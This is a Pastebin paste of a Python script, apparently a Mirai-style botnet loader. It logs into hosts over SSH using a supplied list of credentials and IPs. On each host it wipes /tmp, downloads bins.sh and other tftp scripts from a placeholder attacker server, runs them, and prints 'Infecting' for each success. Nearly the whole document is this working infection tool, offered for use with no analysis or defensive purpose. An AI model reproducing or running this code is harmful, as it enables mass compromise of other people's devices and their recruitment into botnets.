miraip0ts

LRAB wget

Jan 24th, 2017
1,370
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.17 KB | None | 0 0
  1. #!/usr/bin/python
  2. # LRAB scanner w.py instead of cli.pl so witch means you don't need to install any but python-paramiko -y
  3. # LRAN Scanner w.py by Godz-Soldiers
  4.  
  5. import sys, re, os, paramiko
  6. from multiprocessing import Process
  7.  
  8. if len(sys.argv) < 2:
  9.  sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
  10.  
  11. paramiko.util.log_to_file("/dev/null")
  12. cmd='cd /tmp; rm -rf *;busybox wget -q http://YourerverIP/bins.sh; chmod +x bins.sh; sh bins.sh; rm -rf *; busybox tftp -r tftp.sh -g ; sh tftp.sh; busybox tftp -c get tftp2.sh; sh tftp2.sh\r\n'
  13. r34d = open(str(sys.argv[1]),'a+')
  14. print "\033[31mStarting Scan!\n"
  15. def w0rk(username,password,ip):
  16.  try:
  17.   port = 22
  18.   ssh = paramiko.SSHClient()
  19.   ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  20.   ssh.connect(ip, port = port, username=username, password=password, timeout=3)
  21.   print "\033[32m[\033[31m+\033[32m] Infecting:\x1b[31m "+ip+"\x1b[31m\n"
  22.   ssh.exec_command(""+cmd+"")
  23.   ssh.close()
  24.  except:
  25.   pass
  26. for line in r34d:
  27.  ip_1nfo = line.split(":")
  28.  g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],))
  29.  g0d.start()
  30.  username=ip_1nfo[0]
  31.  password=ip_1nfo[1]
  32.  ip=ip_1nfo[2]
  33. g0d.join()
Advertisement
Add Comment
Please, Sign In to add comment